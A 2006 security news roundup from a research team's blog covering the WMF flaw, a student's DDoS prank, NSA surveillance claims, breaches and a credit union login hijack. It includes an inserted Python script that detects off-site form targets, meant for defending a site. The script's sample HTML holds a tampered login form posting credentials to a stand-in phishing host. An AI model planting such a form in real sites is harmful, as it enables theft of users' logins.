
Innovation in Information Security

Coverage of important Information Security and Information Technology news and events from the research team at Sûnnet Beskerming.


Privacy Matters

The recent problems with the WMF image format, which led to Microsoft releasing an out-of-cycle patch a couple of weeks ago, have also affected Microsoft's next operating system, Vista, even though it hasn't been released yet. Patches have been released for Beta users of Vista to help keep their installations secure from the image handling vulnerability. The earlier information available about the flaw did not list Vista as vulnerable, and it is an early bloody nose for the new Operating System, which is said to be the most secure that Microsoft has ever developed.

The lack of a patch for Windows 9x derived Operating Systems for the same vulnerability has concerned some users, given that they have various requirements to keep older systems running on deprecated software. Microsoft has justified the lack of a patch by stating that the only exploitation route on these older systems requires a user to print a document or image that calls the vulnerable functions, and that those functions cannot be reached through other system actions.

An article was published last week in which it was claimed that the original WMF vulnerability was an intentional backdoor installed by Microsoft into their systems to allow certain parties unrestricted access. Unfortunately for this argument, there are several facts which negate it. If it is a backdoor, it is a somewhat odd one, as it requires the user to interact with the vulnerable content before any exploit takes effect (that is, it cannot be fully automated). Secondly, software which recreates a number of Windows APIs under Linux, such as WINE, also demonstrates the WMF vulnerability. This undermines the original claim, because the WMF support in that software was developed from the original API specification. The root cause of the vulnerability therefore lies in the API specification itself, which is not the usual place for a hidden backdoor to be specified.

There is good news, however, for users of Microsoft's current Consumer / Pro Operating System, Windows XP, with the publication of information on Microsoft's extension of support for that version. Normally mainstream support would have ended on December 31, 2006, but due to the delays encountered in releasing the next version of Windows (Vista), this date has been extended to an unconfirmed date two years after the release of Vista. Mainstream support means Microsoft will continue to supply security patches and hotfixes for the software until the end date, and Extended support for business users (continuing to supply hotfixes) will run for another five years beyond that.

A US High School student has discovered to his detriment that certain forms of online pranking can have serious real world outcomes. The student is being charged with a felony for encouraging other students to continually refresh their school's public website in their Internet browsers, in order to deny service to other site visitors (or even to cause the site to crash). Ultimately, what the student encouraged was a distributed Denial of Service (DDoS), whereby numerous requests are sent from a wide variety of Internet addresses, preventing legitimate users from accessing a website. Due to the large number of source IP addresses, this sort of attack is very difficult to defend against.

It is reported that the student's intent was to cause an outage of the school's website, but it is debatable whether he should have been charged with a felony for the case (perhaps a stern warning and a suspension from school would have been better). Online rights activists are all riled up over the case, with many claiming that by simply refreshing a webpage (which many would do anyway), it now makes them a criminal.

The above case alone wouldn't have stood out, except for new laws being passed in the United States which make various forms of online stalking illegal. While the concept is well intentioned, the implementation probably doesn't take into account some of the finer points of how the Internet works. Even posting to a newsgroup or web forum could become illegal under these new laws.

To finish up the concerns over privacy, an ex-NSA employee went public about surveillance programs that the US was said to be running against its own citizens. With claim and counterclaim being thrown about regarding the veracity of the ex-employee's claims, the mere publication of them raises a range of concerns about the information gathering capabilities of a range of three letter agencies, and also about how those capabilities have been used against the people they are meant to protect. Some observers have even gone so far as to claim that a new form of McCarthyism has started to emerge amongst the agencies and Governments monitoring online activities.

Although the ex-employee claims that what he has released is at an appropriate classification level, observers who subscribe to the 'tip of the iceberg' approach were sent into a flurry of speculation as to what else the NSA is currently capable of doing, and what it is actually doing.

In the latest loss of identity data from a hotel group (following on from the Marriott losses), the Atlantis Resort in the Bahamas has disclosed that 50,000 identity records were stolen from a hotel database. No timeframe is given for when the compromise took place, but the resort has committed to providing 12 months of credit monitoring for affected individuals, has commenced notifying each person who was affected, and is working with law enforcement agencies to investigate the matter.

An attack directed at a specific target can sometimes net better results. A Credit Union in the United States had its website hacked recently, resulting in the theft of tens of thousands of US Dollars from Credit Union clients. The hack was achieved by redirecting the login script on the official site to a site in Greece which had been set up to mimic the look and feel of the legitimate banking solution. Because the implicit trust was already there (clients having logged on through the legitimate Credit Union site), they were more inclined to believe the site even though it didn't appear exactly as the official site did.

The Credit Union was forced to take down its site while the issue was being resolved, and has also taken a credibility hit over the attack. Information Security company Sunbelt has also provided in-depth details of some malware which redirects requests for a number of financial institutions to an excellent forgery of their sites (one that would be very difficult to distinguish from the real thing), while the URL in the address bar still appears legitimate.
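The Credit Union incident above hinged on a single change to the site's own login page: the form (or the script driving it) was pointed at a host the institution did not control. A site owner can catch that class of tampering by periodically fetching their own login page and checking every place credentials are sent or code is loaded from against an allow-list of hosts. The following is an added example (not code from the Credit Union, Sunbelt, or the original article) using only the Python standard library; the hostnames, page URL and sample HTML are constructed for illustration. Note that it only covers the first case, where the page content itself is altered; the Sunbelt malware, which redirects requests while the address bar stays legitimate, would not change the served page and needs host-resolution monitoring instead.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: the institution's login page after its form has been
# redirected off-site. Hostnames are invented for this example.
EXPECTED_HOST = "online.example-cu.test"
PAGE_URL = "https://online.example-cu.test/login"

SAMPLE_HTML = """
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-cu.test/jquery.js"></script>
</head><body>
<form id="login" method="post" action="https://secure-login.example-phish.test/auth">
  <input name="user"><input name="pass" type="password">
</form>
<iframe src="//tracker.example-phish.test/f.html"></iframe>
</body></html>
"""

# Tag -> attribute pairs that decide where credentials go or code comes from.
WATCHED = {"form": "action", "script": "src", "iframe": "src"}


class TargetCollector(HTMLParser):
    """Collects the absolute URL of every watched attribute on the page."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.targets = []  # list of (tag, absolute_url)

    def handle_starttag(self, tag, attrs):
        attr_name = WATCHED.get(tag)
        if attr_name is None:
            return
        value = dict(attrs).get(attr_name)
        if tag == "form" and not value:
            value = ""  # a missing or empty action submits to the page's own URL
        if value is None:
            return
        # urljoin resolves relative ("/static/app.js") and protocol-relative
        # ("//host/path") references against the page URL.
        self.targets.append((tag, urljoin(self.base_url, value)))


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def find_offsite_targets(html, page_url, allowed_hosts):
    """Return (tag, url) pairs whose host is not in allowed_hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    collector = TargetCollector(page_url)
    collector.feed(html)
    return [(tag, url) for tag, url in collector.targets
            if host_of(url) not in allowed]


def login_form_is_intact(html, page_url, allowed_hosts):
    """True when every form on the page submits to an allowed host."""
    return not any(tag == "form"
                   for tag, _ in find_offsite_targets(html, page_url, allowed_hosts))


if __name__ == "__main__":
    allowed = {EXPECTED_HOST, "cdn.example-cu.test"}
    for tag, url in find_offsite_targets(SAMPLE_HTML, PAGE_URL, allowed):
        print(f"ALERT: <{tag}> points off-site: {url}")
    print("login form intact:", login_form_is_intact(SAMPLE_HTML, PAGE_URL, allowed))
```

Run against the constructed page this flags the form action and the iframe, while the two scripts pass because they resolve to allowed hosts. In practice the allow-list should be every host the institution genuinely serves assets from, and the check should run from outside the network so that it sees the page exactly as customers do.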

Finally, the first Apple Macintosh machines with Intel chips powering them are scheduled to ship in February. Although Apple has said that it will not prevent anyone from dual booting Windows and OS X on the Intel-based machines, and Apple and Microsoft have agreed to a five year arrangement under which Microsoft will continue to develop software for OS X, the first warning shot may have been fired by Microsoft. Microsoft has announced that it will cease development of Windows Media Player for OS X. In its place, it has provided a link to a third party provider who specialises in supporting OS X users who need to play back Windows media content.

16 January 2006
